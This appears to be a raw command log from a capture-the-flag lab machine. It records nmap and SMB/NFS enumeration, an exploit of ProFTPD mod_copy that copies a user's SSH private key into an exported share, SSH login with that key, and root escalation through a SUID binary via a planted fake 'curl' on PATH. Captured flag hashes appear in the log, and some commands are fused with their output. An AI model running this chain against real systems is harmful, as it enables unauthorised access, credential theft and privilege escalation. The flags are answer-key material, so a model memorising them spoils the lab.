mkdir scans
nmap -A -sC 10.10.190.181 -oN scans/nmap_1.txt7
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.190.181 -oN scans/nmap_2.txt3
smbclient //10.10.190.181/anonymous
^Enter
lslog.txt
exit
smbget -R smb://10.10.190.181/anonymous
^Enter
cat log.txt
grep -E 'FTP|' log.txt
grep -E 'key|' log.txt21
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.190.181 -oN scans/nmap_3.txt/var
(Terminal 1:)
nc 10.10.190.181 211.3.5
(Terminal 2:)
searchsploit proftpd 1.3.54
http://www.proftpd.org/docs/contrib/mod_copy.html
(Terminal 1/nc:)
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa(Terminal 2:)
mkdir /tmp/kenobiNFS
sudo mount 10.10.190.181:/var /tmp/kenobiNFS
ls -la /tmp/kenobiNFS
cp /tmp/kenobiNFS/tmp/id_rsa ./
sudo chmod 600 id_rsa
sudo ssh -i id_rsa kenobi@10.10.190.181
yes
ls
cat user.txtd0b0f3f53b6caa532a83915e19224899
(Terminal 2/ssh:)
find / -perm -u=s -type f 2>/dev/null/usr/bin/menu
(Terminal 2/ssh:)
/usr/bin/menu
13
(Terminal 2/ssh:)
echo /bin/sh > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
/usr/bin/menu
1
whoami(Terminal 2/ssh:)
cat /root/root.txt177b3cd8562289f37382721c28381f02